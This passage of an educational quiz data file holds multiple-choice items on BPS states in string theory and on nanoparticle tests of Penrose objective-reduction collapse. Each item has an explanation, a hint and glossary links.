      'Large-N duality between gauge theory and gravity',
    ],
    correctIndex: 0,
    explanation: 'BPS states saturate the bound $M \\geq |Z|$ where $Z$ is the central charge of the supersymmetry algebra. Their degeneracy is topological — protected against continuous deformations including changes in $g_s$. This is why counting D-brane states at $g_s \\ll 1$ gives the exact black hole entropy at $g_s \\gg 1$.',
    realWorld: 'Without BPS protection, the Strominger-Vafa calculation would be an approximation. With it, the result is exact — the strongest evidence for string theory as a quantum gravity theory.',
    hint: 'Supersymmetry protects the counting — the degeneracy cannot change as you dial the coupling.',
    glossaryLinks: ['strominger-vafa'],
  },
  {
    id: 4450069, topic: 'quantum-mechanics', difficulty: 'hard',
    question: 'Experimental tests of Penrose OR using optically levitated nanoparticles aim to:',
    options: [
      'Place mesoscopic masses ($\\sim 10^{-15}$–$10^{-12}$ kg) in spatial superposition and measure whether collapse occurs at $\\tau \\approx \\hbar/E_G$ — faster than environmental decoherence alone would predict',
      'Detect gravitational waves from quantum vacuum fluctuations',
      'Measure the gravitational constant $G$ to higher precision',
      'Observe Hawking radiation from microscopic black holes',
    ],
    correctIndex: 0,
    explanation: 'The key experiment: create a quantum superposition of a nanoparticle at two locations separated by distance $d$, then measure how quickly the superposition decoheres. If it collapses faster than all known decoherence mechanisms (gas collisions, blackbody radiation, vibrations), the excess collapse rate tests the Diósi-Penrose prediction $\\Lambda = Gm^2/(\\hbar d)$.',
    realWorld: 'Bouwmeester (UCSB/Leiden), Vinante (INFN), and the proposed MAQRO satellite experiment are all pursuing this measurement. Results expected within this decade.',
    hint: 'Create superposition, measure collapse time, compare to gravitational prediction.',
    glossaryLinks: ['objective-reduction'],
  },
];


